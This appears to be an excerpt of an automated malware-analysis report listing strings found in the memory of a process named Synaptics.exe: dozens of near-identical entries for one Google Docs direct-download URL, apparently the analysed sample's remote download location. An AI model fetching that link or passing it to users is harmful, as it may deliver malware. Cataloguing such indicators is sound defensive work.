                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                              Source: Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMC
                              Source: Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500649438.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.407916229.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377175932.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN.Hb
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNS
                              Source: Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                              Source: Synaptics.exe, 00000002.00000002.499207022.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOQ
                              Source: Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOg
                              Source: Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPe
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                              Source: Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQEk
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQf
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                              Source: Synaptics.exe, 00000002.00000002.499207022.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSS
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSe6
                              Source: Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTb
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTd5
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                              Source: Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUBg
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                              Source: Synaptics.exe, 00000002.00000000.408126624.0000000005878000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500942768.0000000005878000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377610647.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVR
                              Source: Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                              Source: Synaptics.exe, 00000002.00000002.499207022.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWP
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500649438.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.407916229.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377175932.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX$
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                              Source: Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYCc
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYg0
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
